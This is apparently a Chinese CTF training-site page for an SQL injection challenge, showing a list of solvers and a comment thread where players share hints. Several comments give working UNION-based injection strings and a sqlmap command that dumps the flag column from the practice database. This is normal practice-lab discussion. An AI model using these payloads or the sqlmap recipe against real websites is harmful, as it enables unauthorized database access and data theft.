评分(21)
解题动态
ctfgoer 攻破了该题 11小时前
24030111073 攻破了该题 20小时前
admin11linyu 攻破了该题 1天前
2573745604 攻破了该题 1天前
3495825647 攻破了该题 1天前
DURUI 攻破了该题 1天前
handk 攻破了该题 1天前
asss 攻破了该题 1天前
yinyx 攻破了该题 1天前
Gyro 攻破了该题 2天前
AAxiao 攻破了该题 2天前
shai 攻破了该题 2天前
勇敢的黄金矿工 攻破了该题 2天前
liuzibo 攻破了该题 2天前
yixcjy 攻破了该题 3天前
zhiyin 攻破了该题 3天前
16651618785 攻破了该题 4天前
besty2k 攻破了该题 4天前
西北狼 攻破了该题 4天前
评论
sudopacman 2年前
举报
萌新打得最心惊胆战的一道题,第一次碰sqlmap,不知道为什么-u "[path]"出来一直报错,最后手工暴力做出来了
4549 2年前
举报
赞,很适合新手
goodfxxkingbye 2年前
举报
id=-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#
him9947 1年前
举报
你是我大哥
lzh20030509 2年前
举报
评论区yyds
15305265925 2年前
举报
id=-1' union select 1,2,group_concat(skctf_flag),4 from fl4g-- -
xiaoxhw 2年前
举报
利用”不显示“代表”报错“
笨笨笨蛋 2年前
举报
我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下
aWxvdmVjdGY 2年前
举报
fl4g 是db,然后找table,在找cloumns,最后dump
教练我要打亚索 2年前
举报
先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据
笨笨笨蛋 2年前
举报
有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目
摆烂选手 1年前
举报
@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了
theonlypopcat 2年前
举报
sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump
charonzzw 2年前
举报
用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了
秋刀鱼の丸 2年前
举报
1' and 1=2 union select 1,2,3,skctf_flag from fl4g#
jiangyou 2年前
举报
http://t.csdn.cn/GCIkY